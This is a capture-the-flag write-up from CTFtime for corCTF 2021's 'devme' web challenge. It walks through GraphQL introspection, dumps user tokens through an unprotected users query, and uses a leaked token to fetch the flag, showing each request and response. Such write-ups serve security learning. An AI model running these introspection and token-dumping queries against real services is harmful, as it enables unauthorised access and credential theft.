CTFtime.org

devme

by MHax3ers

Rating:

# devme 323 points

# Description
an ex-google, ex-facebook tech lead recommended me this book!

https://devme.be.ax

# Solution

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/corCTF_2021_Writeup/Web/devme/info1.png)

There is an *email form* at the bottom of the webpage.

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/corCTF_2021_Writeup/Web/devme/info2.png)

If we put some random email and click *send* we can see a *request* to [graphql](https://en.wikipedia.org/wiki/GraphQL) endpoint in *network* tab.

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/corCTF_2021_Writeup/Web/devme/info3.png)

### The Request Payload
```json
{
"query": "mutation createUser($email: String!) {\n\tcreateUser(email: $email) {\n\t\tusername\n\t}\n}\n",
"variables": {
"email": "[email protected]"
}
}
```
The thing is that the **query** element can be replaced with anything you want.

First, let's see what defined *GraphQL* queries are available to us.

### Request
```json
{
"query":"{__schema {queryType {fields {name description}}}}"
}
```
### Response
```json
{
"data": {
"__schema": {
"queryType": {
"fields": [
{
"name": "users",
"description": null
},
{
"name": "flag",
"description": null
}
]
}
}
}
}
```
**flag** looks very interesting.

Let's try to query that!

### Request
```json
{
"query":"{flag}"
}
```
### Response
```json
{
"errors": [
{
"message": "Field \"flag\" argument \"token\" of type \"String!\" is required, but it was not provided.",
"locations": [
{
"line": 1,
"column": 2
}
]
}
]
}
```
Hmm.. **token** is required and we don't know that.

Trying random **token** just gives `Invalid token!`

### Request
```json
{
"query":"{flag(token: \"aaa\")}"
}
```
### Response
```json
{
"errors": [
{
"message": "Invalid token!",
"locations": [
{
"line": 1,
"column": 2
}
],
"path": [
"flag"
]
}
],
"data": null
}
```
Now, it's time to look at **users**.

Let's check if **token** is in it.

### Request
```json
{
"query":"{users{token}}"
}
```
### Response
```json
{
"data": {
"users": [
{
"token": "3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b"
},
{
"token": "5568f87dc1ca15c578e6b825ffca7f685ac433c1826b075b499f68ea309e79a6"
},
{
"token": "d34609c0c342f7dc6f3d8b18356dfeda82a233a9846c7d2dbab8fb803719caf9"
},
...
```
There are a lot of tokens.

Let's try the first one!

### Request
```json
{
"query":"{flag(token: \"3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b\")}"
}
```
### Response
```json
{
"data": {
"flag": "corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}"
}
}
```
There is the flag!!!

*flag*: `corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}`

Original writeup (https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/corCTF_2021_Writeup/Web/devme).

Comments